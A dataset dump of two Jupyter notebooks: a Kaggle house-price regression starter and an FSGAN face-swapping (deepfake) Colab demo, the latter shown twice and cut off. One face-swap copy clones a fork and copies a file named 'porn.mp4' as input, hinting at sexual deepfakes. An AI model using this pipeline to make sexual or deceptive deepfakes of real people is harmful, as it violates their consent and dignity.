path
stringlengths 7
265
| concatenated_notebook
stringlengths 46
17M
|
---|---|
_notebooks/2021_09_26_kaggle_Housing_Prices.ipynb | ###Markdown
Kaggle Housing Prices> This is a Kaggle starter notebook for Predicting Housing Prices- toc: true- badges: true- comments: true- categories: [kaggle, starter]- images: images/housing-prices.png
###Code
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python Docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
# Input data files are available in the read-only "../input/" directory
# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory
import os
for dirname, _, filenames in os.walk('/kaggle/input'):
for filename in filenames:
print(os.path.join(dirname, filename))
# You can write up to 20GB to the current directory (/kaggle/working/) that gets preserved as output when you create a version using "Save & Run All"
# You can also write temporary files to /kaggle/temp/, but they won't be saved outside of the current session
from pathlib import Path
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split, KFold
from sklearn.linear_model import LinearRegression, Ridge, Lasso
from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor
from sklearn.svm import SVR
from xgboost import XGBRFRegressor, XGBRegressor
from lightgbm import LGBMRegressor
from sklearn.preprocessing import StandardScaler, OneHotEncoder
from sklearn.impute import SimpleImputer, KNNImputer
from sklearn.compose import ColumnTransformer
from sklearn.pipeline import Pipeline
from sklearn.metrics import mean_squared_log_error, mean_squared_error
from functools import partial
import optuna
optuna.logging.set_verbosity(optuna.logging.ERROR)
def rmse(y_true, y_pred):
return np.sqrt(mean_squared_error(y_true, y_pred))
DATA_DIR = Path("/kaggle/input/house-prices-advanced-regression-techniques/")
train_df = pd.read_csv(DATA_DIR / "train.csv")
test_df = pd.read_csv(DATA_DIR / "test.csv")
sub_df = pd.read_csv(DATA_DIR / "sample_submission.csv")
train_df.head()
# Find Numerical and Categorical Columns
# Choose only columns that have at least 1000 non-null values
train_df.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 1460 entries, 0 to 1459
Data columns (total 81 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 Id 1460 non-null int64
1 MSSubClass 1460 non-null int64
2 MSZoning 1460 non-null object
3 LotFrontage 1201 non-null float64
4 LotArea 1460 non-null int64
5 Street 1460 non-null object
6 Alley 91 non-null object
7 LotShape 1460 non-null object
8 LandContour 1460 non-null object
9 Utilities 1460 non-null object
10 LotConfig 1460 non-null object
11 LandSlope 1460 non-null object
12 Neighborhood 1460 non-null object
13 Condition1 1460 non-null object
14 Condition2 1460 non-null object
15 BldgType 1460 non-null object
16 HouseStyle 1460 non-null object
17 OverallQual 1460 non-null int64
18 OverallCond 1460 non-null int64
19 YearBuilt 1460 non-null int64
20 YearRemodAdd 1460 non-null int64
21 RoofStyle 1460 non-null object
22 RoofMatl 1460 non-null object
23 Exterior1st 1460 non-null object
24 Exterior2nd 1460 non-null object
25 MasVnrType 1452 non-null object
26 MasVnrArea 1452 non-null float64
27 ExterQual 1460 non-null object
28 ExterCond 1460 non-null object
29 Foundation 1460 non-null object
30 BsmtQual 1423 non-null object
31 BsmtCond 1423 non-null object
32 BsmtExposure 1422 non-null object
33 BsmtFinType1 1423 non-null object
34 BsmtFinSF1 1460 non-null int64
35 BsmtFinType2 1422 non-null object
36 BsmtFinSF2 1460 non-null int64
37 BsmtUnfSF 1460 non-null int64
38 TotalBsmtSF 1460 non-null int64
39 Heating 1460 non-null object
40 HeatingQC 1460 non-null object
41 CentralAir 1460 non-null object
42 Electrical 1459 non-null object
43 1stFlrSF 1460 non-null int64
44 2ndFlrSF 1460 non-null int64
45 LowQualFinSF 1460 non-null int64
46 GrLivArea 1460 non-null int64
47 BsmtFullBath 1460 non-null int64
48 BsmtHalfBath 1460 non-null int64
49 FullBath 1460 non-null int64
50 HalfBath 1460 non-null int64
51 BedroomAbvGr 1460 non-null int64
52 KitchenAbvGr 1460 non-null int64
53 KitchenQual 1460 non-null object
54 TotRmsAbvGrd 1460 non-null int64
55 Functional 1460 non-null object
56 Fireplaces 1460 non-null int64
57 FireplaceQu 770 non-null object
58 GarageType 1379 non-null object
59 GarageYrBlt 1379 non-null float64
60 GarageFinish 1379 non-null object
61 GarageCars 1460 non-null int64
62 GarageArea 1460 non-null int64
63 GarageQual 1379 non-null object
64 GarageCond 1379 non-null object
65 PavedDrive 1460 non-null object
66 WoodDeckSF 1460 non-null int64
67 OpenPorchSF 1460 non-null int64
68 EnclosedPorch 1460 non-null int64
69 3SsnPorch 1460 non-null int64
70 ScreenPorch 1460 non-null int64
71 PoolArea 1460 non-null int64
72 PoolQC 7 non-null object
73 Fence 281 non-null object
74 MiscFeature 54 non-null object
75 MiscVal 1460 non-null int64
76 MoSold 1460 non-null int64
77 YrSold 1460 non-null int64
78 SaleType 1460 non-null object
79 SaleCondition 1460 non-null object
80 SalePrice 1460 non-null int64
dtypes: float64(3), int64(35), object(43)
memory usage: 924.0+ KB
###Markdown
EDA
###Code
# Most of the homes have sale price between 100-200K
train_df["SalePrice"].hist(bins=50)
# Converts LongTail to Normal Dist
# So We should convert target to Log, even if the Metric is not using it
np.log(train_df["SalePrice"]).hist(bins=50);
# Observe that only two houses have over 700K Sale Price
# May be we should exclude them from dataset since there's no much we can gain from two data points
train_df.plot(kind="scatter", x="Id", y="SalePrice", alpha=0.25)
plt.figure(figsize=(12,10))
sns.heatmap(train_df.corr(), cmap='Greys');
train_df.corr()
corr_cols = train_df.corr()["SalePrice"].nlargest(15).index
corr_cols
plt.figure(figsize=(10, 6))
sns.heatmap(train_df.loc[:, corr_cols].corr(), annot=True, cmap="gray")
## Lets look at ones with highest Correlation with SalePrice
# Overall Quality has big impact on SalePrice
train_df.plot(kind="scatter", x="OverallQual", y="SalePrice", alpha=0.25)
## Lets look at ones with highest Correlation with SalePrice
# GrLivAera is also strongly correlated.
# There are only four datapoints over 4K sqFeet. Should we include them?
train_df.plot(kind="scatter", x="GrLivArea", y="SalePrice", alpha=0.25)
train_df[train_df.GrLivArea > 4000]
## Lets look at ones with highest Correlation with SalePrice
# GrLivAera is also strongly correlated.
# There are only four datapoints over 4K sqFeet. Should we include them?
train_df.plot(kind="scatter", x="GarageArea", y="SalePrice", alpha=0.25)
train_df[train_df.GarageArea > 1200]
# Exclude the two rows that are over 700k
train_df = train_df[train_df["SalePrice"] < 700000]
# Automatic way to select all Categorical and Numeric Columns
def get_features(train_df):
num_features, cat_features = [], []
for col in train_df.columns:
if col in ["Id", "SalePrice"]:
continue
dtype = train_df[col].dtype
ratio = pd.notna(train_df[col]).sum() / len(train_df[col])
if ratio < 0.5:
continue
if dtype == "object":
cat_features.append(col)
else:
num_features.append(col)
return num_features, cat_features
num_features, cat_features = get_features(train_df)
cat_features
def get_preprocess_pipeline(train_df, sample_features=False):
# Get Numeric and Categorical Features
numeric_features, categorical_features = get_features(train_df)
target = "SalePrice"
if sample_features:
numeric_features = ["LotArea"]
categorical_features = ["SaleType", "SaleCondition"]
numeric_transformer = Pipeline(steps=[
('imputer', KNNImputer(n_neighbors=5)),
('scaler', StandardScaler())])
categorical_transformer = Pipeline(steps=[
('imputer', SimpleImputer(strategy='constant', fill_value='N/A')),
('onehpt', OneHotEncoder(handle_unknown='ignore'))])
preprocessor = ColumnTransformer(
transformers=[
('num', numeric_transformer, numeric_features),
('cat', categorical_transformer, categorical_features)])
return preprocessor, numeric_features + categorical_features, target
def train_LR(train_df, test_df, sample_features=False):
"""
Train a Linear Regression Model
"""
# Start with simple linear Model
preprocessor, features, target = get_preprocess_pipeline(train_df, sample_features=sample_features)
clf = Pipeline(steps=[('preprocessor', preprocessor),
('classifier', LinearRegression())])
X_train = train_df[features]
y_train = np.log(train_df[target])
X_test = test_df[features]
X_train, X_valid, y_train, y_valid = train_test_split(X_train, y_train, test_size=0.2, random_state=0)
clf.fit(X_train, y_train)
print("RMSE Log Error", rmse(clf.predict(X_valid), y_valid))
# On Prediction, do exp to inverse the loge done during training
sub_df = pd.DataFrame({
"Id": test_df["Id"],
"SalePrice": np.exp(clf.predict(X_test))
})
return sub_df
# Choose only a small sample of features.- 2-3 features to test the pipeline
sub_df = train_LR(train_df, test_df, sample_features=True)
sub_df.to_csv("submission_lr_sample.csv", index=False)
# Make a submission to Kaggle after downloading the submission file from right side (data -> output)
# Lets improve the model, by giving it more features
sub_df = train_LR(train_df, test_df, sample_features=False)
sub_df.to_csv("submission_lr.csv", index=False)
# Make a submission to Kaggle after downloading the submission file from right side (data -> output)
kfold = KFold(n_splits=10, shuffle=True, random_state=42)
for p1, p2 in kfold.split(range(20)):
print(p1, p2)
kfold = KFold(n_splits=7, shuffle=True, random_state=42)
for idxs in kfold.split(train_df):
print(idxs[0].shape, idxs[1].shape)
idxs
def hyperparam_finder_nocv(df, model_fn, trial):
"""
Hyperparameter Finder
"""
# Start with simple linear Model
model = model_fn(trial)
preprocessor, features, target = get_preprocess_pipeline(train_df, sample_features=False)
clf = Pipeline(steps=[('preprocessor', preprocessor),
('classifier', model)])
X_train = train_df[features]
y_train = np.log(train_df[target])
X_train, X_valid, y_train, y_valid = train_test_split(X_train, y_train, test_size=0.2, random_state=0)
clf.fit(X_train, y_train)
return rmse(clf.predict(X_valid), y_valid)
def hyperparam_finder(df, model_fn, trial):
"""
Hyperparameter Finder
"""
# Start with simple linear Model
model = model_fn(trial)
kfold = KFold(n_splits=5, shuffle=True, random_state=42)
valid_errors = []
test_preds = []
valid_preds = []
for train_idxs, valid_idxs in kfold.split(df):
train_df = df.iloc[train_idxs]
valid_df = df.iloc[valid_idxs]
preprocessor, features, target = get_preprocess_pipeline(train_df, sample_features=False)
clf = Pipeline(steps=[('preprocessor', preprocessor),
('classifier', model)])
X_train = train_df[features]
y_train = np.log(train_df[target])
X_valid = valid_df[features]
y_valid = np.log(valid_df[target])
X_test = test_df[features]
clf.fit(X_train, y_train)
y_valid_preds = clf.predict(X_valid)
valid_errors.append(rmse(y_valid_preds, y_valid))
# Return Valid Pred Score for HyperParam Tuning
return np.mean(valid_errors)
# You would have seen an improvement on your Leaderboard by providing it better features
# Now lets do KFold (5 Fold)
def train_kfold(df, test_df, ModelClass, **model_kwargs):
"""
Train a Regression Model with 5 Fold CV
"""
# Start with simple linear Model
kfold = KFold(n_splits=5, shuffle=True, random_state=42)
valid_errors = []
test_preds = []
valid_preds = []
for train_idxs, valid_idxs in kfold.split(df):
train_df = df.iloc[train_idxs]
valid_df = df.iloc[valid_idxs]
preprocessor, features, target = get_preprocess_pipeline(train_df, sample_features=False)
clf = Pipeline(steps=[('preprocessor', preprocessor),
('classifier', ModelClass(**model_kwargs))])
X_train = train_df[features]
y_train = np.log(train_df[target])
X_valid = valid_df[features]
y_valid = np.log(valid_df[target])
X_test = test_df[features]
clf.fit(X_train, y_train)
y_valid_preds = clf.predict(X_valid)
valid_errors.append(rmse(y_valid_preds, y_valid))
test_preds.append(np.exp(clf.predict(X_test)))
valid_preds.append(pd.DataFrame({
"Id": valid_df["Id"],
"SalePrice": np.exp(y_valid_preds)
}))
print("RMSE Log Error", np.mean(valid_errors))
# On Prediction, do exp to inverse the loge done during training
sub_df = pd.DataFrame({
"Id": test_df["Id"],
"SalePrice": np.mean(test_preds, axis=0)
})
# Return test prediction with CV and the Validation Prediction (For Stacking later)
return sub_df, pd.concat(valid_preds)
# Lets improve the model by choosing XGBoost over Linear Classifier
model1_sub_df, model1_valid_preds = train_kfold(train_df, test_df, LinearRegression)
sub_df.to_csv("submission_lr_kfold.csv", index=False)
# Make a submission to Kaggle after downloading the submission file from right side (data -> output)
# Score might have improved over the LR without kfold.
def train_XGB_kfold(df, test_df):
"""
Train a XGBoost Model with 5 Fold CV
"""
# Start with simple linear Model
kfold = KFold(n_splits=5, shuffle=True, random_state=42)
valid_errors = []
test_preds = []
valid_preds = []
for train_idxs, valid_idxs in kfold.split(df.index.values):
train_df = df.loc[train_idxs]
valid_df = df.loc[valid_idxs]
preprocessor, features, target = get_preprocess_pipeline(train_df, sample_features=False)
clf = Pipeline(steps=[('preprocessor', preprocessor),
('classifier', XGBRegressor(n_jobs=-1, n_estimators=500, max_depth=20))])
X_train = train_df[features]
y_train = np.log(train_df[target])
X_valid = valid_df[features]
y_valid = np.log(valid_df[target])
X_test = test_df[features]
clf.fit(X_train, y_train)
y_valid_preds = clf.predict(X_valid)
valid_errors.append(rmse(y_valid_preds, y_valid))
test_preds.append(np.exp(clf.predict(X_test)))
valid_preds.append(pd.DataFrame({
"Id": valid_df["Id"],
"SalePrice": np.exp(y_valid_preds)
}))
print("Mean Squared Log Error", np.mean(valid_errors))
# On Prediction, do exp to inverse the loge done during training
sub_df = pd.DataFrame({
"Id": test_df["Id"],
"SalePrice": np.mean(test_preds, axis=0)
})
# Return test prediction with CV and the Validation Prediction (For Stacking later)
return sub_df, pd.concat(valid_preds)
def train_RF_kfold(df, test_df):
"""
Train a RF Model with 5 Fold CV
"""
# Start with simple linear Model
kfold = KFold(n_splits=5, shuffle=True, random_state=42)
valid_errors = []
test_preds = []
valid_preds = []
for train_idxs, valid_idxs in kfold.split(df.index.values):
train_df = df.loc[train_idxs]
valid_df = df.loc[valid_idxs]
preprocessor, features, target = get_preprocess_pipeline(train_df, sample_features=False)
clf = Pipeline(steps=[('preprocessor', preprocessor),
('classifier', RandomForestRegressor(n_jobs=-1, max_depth=20))])
X_train = train_df[features]
y_train = np.log(train_df[target])
X_valid = valid_df[features]
y_valid = np.log(valid_df[target])
X_test = test_df[features]
clf.fit(X_train, y_train)
y_valid_preds = clf.predict(X_valid)
valid_errors.append(mean_squared_error(y_valid_preds, y_valid))
test_preds.append(np.exp(clf.predict(X_test)))
valid_preds.append(pd.DataFrame({
"Id": valid_df["Id"],
"SalePrice": np.exp(y_valid_preds)
}))
print("Mean Squared Log Error", np.mean(valid_errors))
# On Prediction, do exp to inverse the loge done during training
sub_df = pd.DataFrame({
"Id": test_df["Id"],
"SalePrice": np.mean(test_preds, axis=0)
})
# Return test prediction with CV and the Validation Prediction (For Stacking later)
return sub_df, pd.concat(valid_preds)
Ridge()
def lasso_hparams_finder(trial):
alpha = trial.suggest_float("alpha", 0, 1.0)
max_iter = trial.suggest_int("max_iter", 500, 5000)
return Lasso(alpha=alpha, max_iter=max_iter)
def ridge_hparams_finder(trial):
alpha = trial.suggest_float("alpha", 0, 1.0)
max_iter = trial.suggest_int("max_iter", 500, 5000)
return Ridge(alpha=alpha, max_iter=max_iter)
def xgb_hparams_finder(trial):
max_depth = trial.suggest_int("max_depth", 5, 30)
n_estimators = trial.suggest_int("n_estimators", 100, 300)
learning_rate = trial.suggest_float("learning_rate", 0.001, 1)
tree_method = trial.suggest_categorical("tree_method", ["gpu_hist"])
gamma = trial.suggest_float("gamma", 0, 1)
eta = trial.suggest_float("eta", 0, 1)
return XGBRegressor(
max_depth=max_depth,
n_estimators=n_estimators,
learning_rate=learning_rate,
tree_method=tree_method,
gamma=gamma,
eta=eta
)
def rf_hparams_finder(trial):
max_depth = trial.suggest_int("max_depth", 10, 50)
n_estimators = trial.suggest_int("n_estimators", 100, 300)
return RandomForestRegressor(n_estimators=n_estimators, max_depth=max_depth)
def lightgbm_hparams_finder(trial):
max_depth = trial.suggest_int("max_depth", 5, 30)
n_estimators = trial.suggest_int("n_estimators", 100, 300)
learning_rate = trial.suggest_float("learning_rate", 0.001, 1)
reg_alpha = trial.suggest_float("reg_alpha", 0., 1)
reg_lambda = trial.suggest_float("reg_lambda", 0., 1)
return LGBMRegressor(max_depth=max_depth,
n_estimators=n_estimators,
learning_rate=learning_rate, reg_alpha=reg_alpha, reg_lambda=reg_lambda)
def svr_hparams_finder(trial):
kernel = trial.suggest_categorical("kernel",
['linear', 'poly', 'rbf', 'sigmoid', 'precomputed'])
degree = trial.suggest_int("degree", 1, 4)
c = trial.suggest_float("c", 0, 1)
max_iter = trial.suggest_float("max_iter", 50, 500)
return SVR(kernel=kernel, degree=degree, C=c, max_iterm=max_iter)
# Lets improve the model by choosing XGBoost over Linear Classifier
optuna.create_study()
study = optuna.create_study()
study.optimize(partial(hyperparam_finder, train_df, lasso_hparams_finder),
n_trials=100,
show_progress_bar=True
)
lasso_params = study.best_params # E.g. {'x': 2.002108042}
# Lets improve the model by choosing XGBoost over Linear Classifier
model_options = {
"ridge": ridge_hparams_finder,
"lasso": lasso_hparams_finder,
"xgb": xgb_hparams_finder,
"rf": rf_hparams_finder,
"ligtgbm": lightgbm_hparams_finder,
"svr": svr_hparams_finder
}
best_hparams = []
for model_name, model_hparams_fn in model_options.items():
print(model_name)
optuna.create_study()
study = optuna.create_study()
study.optimize(partial(hyperparam_finder_nocv, train_df, model_hparams_fn),
n_trials=20,
show_progress_bar=True
)
best_hparams.append({
model_name: study.best_params
})
# Lets improve the model by choosing XGBoost over Linear Classifier
optuna.create_study()
study = optuna.create_study()
study.optimize(partial(hyperparam_finder, train_df, lasso_hparams_finder),
n_trials=100,
show_progress_bar=True
)
lasso_params = study.best_params # E.g. {'x': 2.002108042}
# Lets improve the model by choosing XGBoost over Linear Classifier
model1_test_preds, model1_valid_preds = train_kfold(train_df, test_df, Ridge)
# Lets improve the model by choosing XGBoost over Linear Classifier
model2_test_preds, model2_valid_preds = train_kfold(train_df, test_df, XGBRegressor, n_jobs=4, n_estimators=500, max_depth=20)
# Lets improve the model by choosing RF over Linear Classifier
model3_test_preds, model3_valid_preds = train_kfold(train_df, test_df, RandomForestRegressor,n_jobs=4, n_estimators=500, max_depth=20)
# Lets improve the model by choosing SVR
model4_test_preds, model4_valid_preds = train_kfold(train_df, test_df, SVR)
# Lets improve the model by choosing LightGBM
model5_test_preds, model5_valid_preds = train_kfold(train_df, test_df, LGBMRegressor, n_jobs=4, n_estimators=500, max_depth=20)
model1_valid_preds.rename(columns={"SalePrice": "model1_preds"}, inplace=True)
model2_valid_preds.rename(columns={"SalePrice": "model2_preds"}, inplace=True)
model3_valid_preds.rename(columns={"SalePrice": "model3_preds"}, inplace=True)
model4_valid_preds.rename(columns={"SalePrice": "model4_preds"}, inplace=True)
model5_valid_preds.rename(columns={"SalePrice": "model5_preds"}, inplace=True)
model1_test_preds.rename(columns={"SalePrice": "model1_preds"}, inplace=True)
model2_test_preds.rename(columns={"SalePrice": "model2_preds"}, inplace=True)
model3_test_preds.rename(columns={"SalePrice": "model3_preds"}, inplace=True)
model4_test_preds.rename(columns={"SalePrice": "model4_preds"}, inplace=True)
model5_test_preds.rename(columns={"SalePrice": "model5_preds"}, inplace=True)
pd.merge(model1_test_preds, model2_test_preds, left_on="Id", right_on="Id")
# Model Blending - Take the Average of the three Model Predictions
sub_df = pd.merge(model1_test_preds, model2_test_preds, left_on="Id", right_on="Id")
sub_df = pd.merge(sub_df, model3_test_preds, left_on="Id", right_on="Id")
sub_df = pd.merge(sub_df, model4_test_preds, left_on="Id", right_on="Id")
sub_df = pd.merge(sub_df, model5_test_preds, left_on="Id", right_on="Id")
sub_df["SalePrice"] = (sub_df["model1_preds"] + sub_df["model2_preds"] + sub_df["model3_preds"] + sub_df["model4_preds"] + sub_df["model5_preds"])/5
sub_df[["Id", "SalePrice"]].to_csv("submission_model_blend.csv", index=False)
# You would have seen an improvement on your Leaderboard with KFold.
# Now Lets do Model Stacking.
# Choose three Models - LinearRegression, RandomForest and XGBoost and get Predictions
# Average ALL three Predictions (With KFold) and make a Submission. This will give you Model Blending
# TODO
layer1_test_df = pd.merge(model1_test_preds, model2_test_preds, left_on="Id", right_on="Id")
layer1_test_df = pd.merge(layer1_test_df, model3_test_preds, left_on="Id", right_on="Id")
layer1_test_df = pd.merge(layer1_test_df, model4_test_preds, left_on="Id", right_on="Id")
layer1_test_df = pd.merge(layer1_test_df, model5_test_preds, left_on="Id", right_on="Id")
layer1_test_df.head()
layer1_train_df = pd.merge(model1_valid_preds, model2_valid_preds, left_on="Id", right_on="Id")
layer1_train_df = pd.merge(layer1_train_df, model3_valid_preds, left_on="Id", right_on="Id")
layer1_train_df = pd.merge(layer1_train_df, model4_valid_preds, left_on="Id", right_on="Id")
layer1_train_df = pd.merge(layer1_train_df, model5_valid_preds, left_on="Id", right_on="Id")
layer1_train_df = pd.merge(layer1_train_df, train_df[["Id", "SalePrice"]], left_on="Id", right_on="Id")
layer1_train_df.head()
# Finally try Model Stacking (Hint: Using the Validation Predictions you obtained from the CV Models to train a new Model for Prediction)
# You would have seen an improvement on your Leaderboard by providing it better features
# Now lets do KFold (5 Fold)
def train_model_stacking_kfold(df, test_df):
"""
Train a Linear Regression Model with 5 Fold CV
"""
# Start with simple linear Model
kfold = KFold(n_splits=5, shuffle=True, random_state=42)
valid_errors = []
test_preds = []
features = ["model1_preds", "model2_preds", "model3_preds", "model4_preds", "model5_preds"]
df = df.copy()
test_df = test_df.copy()
for feat in features:
df[feat] = np.log(df[feat])
test_df[feat] = np.log(test_df[feat])
df["SalePrice"] = np.log(df["SalePrice"])
for train_idxs, valid_idxs in kfold.split(df):
train_df = df.loc[train_idxs]
valid_df = df.loc[valid_idxs]
X_train = train_df[features]
y_train = train_df["SalePrice"]
X_valid = valid_df[features]
y_valid = valid_df["SalePrice"]
X_test = test_df[features]
clf = LinearRegression()
clf.fit(X_train, y_train)
y_valid_preds = clf.predict(X_valid)
valid_errors.append(rmse(y_valid_preds, y_valid))
test_preds.append(np.exp(clf.predict(X_test)))
print("RMSE Log Error", np.mean(valid_errors))
# On Prediction, do exp to inverse the loge done during training
sub_df = pd.DataFrame({
"Id": test_df["Id"],
"SalePrice": np.mean(test_preds, axis=0)
})
# Return test prediction with CV
return sub_df
sub_df = train_model_stacking_kfold(layer1_train_df, layer1_test_df)
sub_df[["Id", "SalePrice"]].to_csv("submission_model_stack.csv", index=False)
import lightgbm
###Output
_____no_output_____ |
inference/face_swapping.ipynb | ###Markdown
FSGAN Face Swapping Demo A Tesla P100 GPU is recommended for this demo.
###Code
!nvidia-smi
###Output
_____no_output_____
###Markdown
Installation
###Code
import sys
from IPython.display import HTML, clear_output
from base64 import b64encode
# Install the required dependencies
!wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh
!bash Miniconda3-latest-Linux-x86_64.sh -bfp /usr/local
!rm Miniconda3-latest-Linux-x86_64.sh
!conda install pytorch torchvision cudatoolkit=10.1 -c pytorch -y
!pip3 install opencv-python ffmpeg-python youtube-dl yacs
!mkdir -p /content/projects/
%cd /content/projects/
!git clone https://github.com/YuvalNirkin/face_detection_dsfd
!git clone https://github.com/wordsand/fsgan.git
sys.path += ['/usr/local/lib/python3.9/site-packages', '/content/projects']
# Initialize source and target videos from the repository examples
!mkdir -p /content/data
!cp /content/projects/fsgan/docs/examples/shinzo_abe.mp4 /content/data/source.mp4
!cp /content/projects/fsgan/docs/examples/conan_obrien.mp4 /content/data/target.mp4
!cp /content/projects/fsgan/docs/examples/cl.mp4 /content/data/cl.mp4
!cp /content/projects/fsgan/docs/examples/porn.mp4 /content/data/porn.mp4
# Utility functions
import ffmpeg
def encode_audio(video_path, audio_path, output_path):
ffmpeg.concat(ffmpeg.input(video_path), ffmpeg.input(audio_path), v=1, a=1) \
.output(output_path, strict='-2').run(overwrite_output=True)
def display_video(video_path, width=640, clear=True):
vid_data = open(video_path,'rb').read()
vid_url = 'data:video/mp4;base64,' + b64encode(vid_data).decode()
if clear:
clear_output()
return HTML(f"""
<video width={width} controls>
<source src={vid_url} type="video/mp4">
</video>
""")
###Output
_____no_output_____
###Markdown
Mount your Google Drive using the following step or click on "Mount Drive" in the menu to the left
###Code
from google.colab import drive
drive.mount('/content/drive')
###Output
_____no_output_____
###Markdown
Initialize face swapping
###Code
import os
from fsgan.inference.swap import FaceSwapping
from fsgan.criterions.vgg_loss import VGGLoss
#@markdown This step should only be done once unless one of the
#@markdown following parameters is changed:
#@markdown ---
#@markdown Path to the weights directory (make sure it is correct):
weights_dir = '/content/drive/My Drive/fsgan/weights' #@param {type:"string"}
#@markdown Number of finetune iterations on the source subject:
finetune_iterations = 800 #@param {type:"slider", min:100, max:2000, step:1}
#@markdown If True, the inner part of the mouth will be removed from the segmentation:
seg_remove_mouth = True #@param {type:"boolean"}
#@markdown Segmentation batch size
seg_batch_size = 24 #@param {type:"slider", min:1, max:64, step:1}
#@markdown Inference batch size
batch_size = 8 #@param {type:"slider", min:1, max:64, step:1}
#@markdown ---
detection_model = os.path.join(weights_dir, 'v2/WIDERFace_DSFD_RES152.pth')
pose_model = os.path.join(weights_dir, 'shared/hopenet_robust_alpha1.pth')
lms_model = os.path.join(weights_dir, 'v2/hr18_wflw_landmarks.pth')
seg_model = os.path.join(weights_dir, 'v2/celeba_unet_256_1_2_segmentation_v2.pth')
reenactment_model = os.path.join(weights_dir, 'v2/nfv_msrunet_256_1_2_reenactment_v2.1.pth')
completion_model = os.path.join(weights_dir, 'v2/ijbc_msrunet_256_1_2_inpainting_v2.pth')
blending_model = os.path.join(weights_dir, 'v2/ijbc_msrunet_256_1_2_blending_v2.pth')
criterion_id_path = os.path.join(weights_dir, 'v2/vggface2_vgg19_256_1_2_id.pth')
criterion_id = VGGLoss(criterion_id_path)
face_swapping = FaceSwapping(
detection_model=detection_model, pose_model=pose_model, lms_model=lms_model,
seg_model=seg_model, reenactment_model=reenactment_model,
completion_model=completion_model, blending_model=blending_model,
criterion_id=criterion_id,
finetune=True, finetune_save=True, finetune_iterations=finetune_iterations,
seg_remove_mouth=finetune_iterations, batch_size=batch_size,
seg_batch_size=seg_batch_size, encoder_codec='mp4v')
###Output
_____no_output_____
###Markdown
Optional: Download source video from YouTubeYou can change the source URL, start and end times [hh:mm:ss]. Alternatively, manually upload an image or video to **_data_** (in the menu to the left) and rename to **_source.jpg_** or **_source.mp4_** (click "Refresh" if missing). By default the source video will be taken from the repository examples. Optional: Download target video from YouTubeYou can change the target URL, start and end times [hh:mm:ss]. Alternatively, manually upload a video to **_data_** (in the menu to the left) and rename to **_target.mp4_** (click "Refresh" if missing). By default the source video will be taken from the repository examples. Do face swapping
###Code
# Do face swapping
#@markdown ---
#@markdown Toggle whether to finetune the reenactment generator:
finetune = True #@param {type:"boolean"}
#@markdown Source path
source_path = '/content/data/source.mp4' #@param {type:"string"}
#@markdown Source selection method ["longest" | sequence number]:
select_source = 'longest' #@param {type:"string"}
#@markdown Target path
target_path = '/content/data/target.mp4' #@param {type:"string"}
#@markdown Target selection method ["longest" | sequence number]:
select_target = 'longest' #@param {type:"string"}
#@markdown ---
output_tmp_path = '/content/data/output_tmp.mp4'
output_path = '/content/output.mp4'
face_swapping(source_path, target_path, output_tmp_path,
select_source, select_target, finetune)
# Encode with audio and display result
encode_audio(output_tmp_path, target_path, output_path)
os.remove(output_tmp_path)
display_video(output_path)
###Output
_____no_output_____
###Markdown
FSGAN Face Swapping DemoFill out [this form](https://docs.google.com/forms/d/e/1FAIpQLScyyNWoFvyaxxfyaPLnCIAxXgdxLEMwR9Sayjh3JpWseuYlOA/viewform?usp=sf_link),and after receiving the email, add the FSGAN shared directory to your drive:Acknowledgements: We thank Dr. Eyal Gruss, [wangchao0899](https://github.com/wangchao0899), [jjandnn](https://github.com/jjandnn), and [zhuhaozh](https://github.com/zhuhaozh) for helping with this demo. A Tesla P100 GPU is required for this demo. Let's make sure that we have it:
###Code
!nvidia-smi
###Output
_____no_output_____
###Markdown
Installation
###Code
import sys
from IPython.display import HTML, clear_output
from base64 import b64encode
# Install the required dependencies
!wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh
!bash Miniconda3-latest-Linux-x86_64.sh -bfp /usr/local
!rm Miniconda3-latest-Linux-x86_64.sh
!pip3 install opencv-python ffmpeg-python youtube-dl yacs
!mkdir -p /content/projects/
%cd /content/projects/
!git clone https://github.com/YuvalNirkin/face_detection_dsfd
!git clone https://github.com/YuvalNirkin/fsgan.git
sys.path += ['/usr/local/lib/python3.7/site-packages', '/content/projects']
# Initialize source and target videos from the repository examples
!mkdir -p /content/data
!cp /content/projects/fsgan/docs/examples/shinzo_abe.mp4 /content/data/source.mp4
!cp /content/projects/fsgan/docs/examples/conan_obrien.mp4 /content/data/target.mp4
# Utility functions
import ffmpeg
def encode_audio(video_path, audio_path, output_path):
ffmpeg.concat(ffmpeg.input(video_path), ffmpeg.input(audio_path), v=1, a=1) \
.output(output_path, strict='-2').run(overwrite_output=True)
def display_video(video_path, width=640, clear=True):
vid_data = open(video_path,'rb').read()
vid_url = 'data:video/mp4;base64,' + b64encode(vid_data).decode()
if clear:
clear_output()
return HTML(f"""
<video width={width} controls>
<source src={vid_url} type="video/mp4">
</video>
""")
###Output
_____no_output_____
###Markdown
Mount your Google Drive using the following step or click on "Mount Drive" in the menu to the left
###Code
from google.colab import drive
drive.mount('/content/drive')
###Output
_____no_output_____
###Markdown
Initialize face swapping
###Code
import os
from fsgan.inference.swap import FaceSwapping
from fsgan.criterions.vgg_loss import VGGLoss
#@markdown This step should only be done once unless one of the
#@markdown following parameters is changed:
#@markdown ---
#@markdown Path to the weights directory (make sure it is correct):
weights_dir = '/content/drive/My Drive/fsgan/weights' #@param {type:"string"}
#@markdown Number of finetune iterations on the source subject:
finetune_iterations = 800 #@param {type:"slider", min:100, max:2000, step:1}
#@markdown If True, the inner part of the mouth will be removed from the segmentation:
seg_remove_mouth = True #@param {type:"boolean"}
#@markdown ---
detection_model = os.path.join(weights_dir, 'v2/WIDERFace_DSFD_RES152.pth')
pose_model = os.path.join(weights_dir, 'shared/hopenet_robust_alpha1.pth')
lms_model = os.path.join(weights_dir, 'v2/hr18_wflw_landmarks.pth')
seg_model = os.path.join(weights_dir, 'v2/celeba_unet_256_1_2_segmentation_v2.pth')
